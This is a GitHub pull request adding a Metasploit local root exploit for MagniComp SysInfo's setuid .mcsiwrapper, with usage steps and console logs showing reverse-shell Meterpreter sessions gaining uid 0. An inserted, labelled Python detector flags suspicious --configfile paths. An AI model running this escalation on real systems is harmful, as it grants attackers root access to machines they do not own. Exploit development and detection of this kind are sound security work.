
Add MagniComp SysInfo mcsiwrapper Privilege Escalation exploit #9504

Merged
merged 3 commits into from Feb 20, 2018

Conversation

bcoles
Contributor

@bcoles bcoles commented Feb 5, 2018

Add MagniComp SysInfo mcsiwrapper Privilege Escalation exploit.

        This module attempts to gain root privileges on systems running
        MagniComp SysInfo versions prior to 10-H64.

        The .mcsiwrapper suid executable allows loading a config file using the
        '--configfile' argument. The 'ExecPath' config directive is used to set
        the executable load path. This module abuses this functionality to set
        the load path resulting in execution of arbitrary code as root.

        This module has been tested successfully with SysInfo version
        10-H63 on Fedora 20 x86_64 and 10-GA on Solaris 10u11 x86.

Verification

  • Start msfconsole
  • Get a session
  • use multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
  • set SESSION <ID>
  • run
  • Verify you get a root session

Example Output

msf > use exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > set session 1
session => 1
msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.244:4444
[*] Using target: Linux
[*] Writing '/tmp/.0rk4PC/vFdxxuBVkh' (21 bytes) ...
[*] Writing '/tmp/.0rk4PC/eoGVzYwGa' (207 bytes) ...
[*] Executing payload...
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.137:42229) at 2018-02-05 07:38:35 -0500
[+] Deleted /tmp/.0rk4PC/vFdxxuBVkh
[+] Deleted /tmp/.0rk4PC/eoGVzYwGa
[+] Deleted /tmp/.0rk4PC

meterpreter > getuid
Server username: uid=0, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Fedora 20 (Linux 3.19.8-100.fc20.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
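
A defender-side counterpart to the mechanism described in the PR text, as an added example that is not part of the PR or of the Metasploit module: it scans process-execution records and flags `.mcsiwrapper` launches whose `--configfile` argument points outside the SysInfo install tree (the `/tmp/.xxxxxx/` paths in the output above are exactly that pattern). The install prefix `/opt/sysinfo`, the record layout and the `--configfile=PATH` spelling are assumptions; only the `--configfile <path>` form appears on the page.

```python
"""Flag .mcsiwrapper invocations that load a config file from an untrusted path.

Added example, not from the PR or the SysInfo vendor. Feed it process events
(auditd EXECVE, EDR telemetry) reduced to {"uid": ..., "cmdline": ...} dicts.
"""
import shlex
from typing import Dict, List, Optional

# Assumption: where legitimate SysInfo configuration lives (hypothetical paths).
TRUSTED_CONFIG_PREFIXES = ("/opt/sysinfo/", "/etc/sysinfo/")


def config_file_from_cmdline(cmdline: str) -> Optional[str]:
    """Return the --configfile path if cmdline runs .mcsiwrapper with one, else None."""
    argv = shlex.split(cmdline)
    if not argv or not argv[0].endswith(".mcsiwrapper"):
        return None
    for i, arg in enumerate(argv):
        if arg == "--configfile" and i + 1 < len(argv):  # form shown in the PR
            return argv[i + 1]
        if arg.startswith("--configfile="):  # assumed alternate spelling
            return arg.split("=", 1)[1]
    return None


def is_suspicious(record: Dict[str, str]) -> bool:
    """True when the setuid wrapper is pointed at a config outside the install tree."""
    cfg = config_file_from_cmdline(record["cmdline"])
    if cfg is None:
        return False
    # Config files under /tmp, home directories or hidden dirs let the caller
    # control 'ExecPath', which is the whole root-escalation path here.
    return not cfg.startswith(TRUSTED_CONFIG_PREFIXES)


def flag_records(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Filter a batch of process events down to the ones worth an analyst's look."""
    return [r for r in records if is_suspicious(r)]


# Constructed sample events (not real logs); the /tmp path is copied from the PR output.
SAMPLE_EVENTS = [
    {"uid": "1000", "cmdline": "/opt/sysinfo/bin/.mcsiwrapper --configfile /tmp/.0rk4PC/vFdxxuBVkh"},
    {"uid": "1000", "cmdline": "/opt/sysinfo/bin/.mcsiwrapper --configfile /opt/sysinfo/etc/sysinfo.cf"},
    {"uid": "0", "cmdline": "/usr/bin/ls -la /tmp"},
]

if __name__ == "__main__":
    for hit in flag_records(SAMPLE_EVENTS):
        print("suspicious .mcsiwrapper launch by uid", hit["uid"], "->", hit["cmdline"])
```

A hit on a real host is a prompt to check the installed SysInfo version against the 10-H64 threshold named in the PR, not proof of compromise on its own.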

@Chiggins
Contributor

@Chiggins Chiggins commented Feb 7, 2018

If anyone doesn't mind, I'm going to self assign for my first PR as a committer. 💯

@Chiggins Chiggins self-assigned this Feb 7, 2018
@busterb
Contributor

@busterb busterb commented Feb 7, 2018

Go for it!

@Chiggins
Contributor

@Chiggins Chiggins commented Feb 7, 2018

Tested against Fedora 27 and it worked like a charm!

msf5 exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > run

[*] Started reverse TCP handler on 192.168.1.252:4445 
[*] Using target: Linux
[*] Writing '/tmp/.Duxko1/9M2WGR' (21 bytes) ...
[*] Writing '/tmp/.Duxko1/zuc5EBYz' (207 bytes) ...
[*] Executing payload...
[*] Sending stage (857352 bytes) to 192.168.1.162

meterpreter > sysinfo 
Computer     : fedora27.chigs.local
OS           : Fedora 27 (Linux 4.13.9-300.fc27.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid 
Server username: uid=0, gid=1000, euid=0, egid=1000

@Chiggins Chiggins merged commit 1177efe into rapid7:master Feb 20, 2018
1 check passed
@bcoles bcoles deleted the magnicomp_sysinfo_mcsiwrapper_priv_esc branch Feb 20, 2018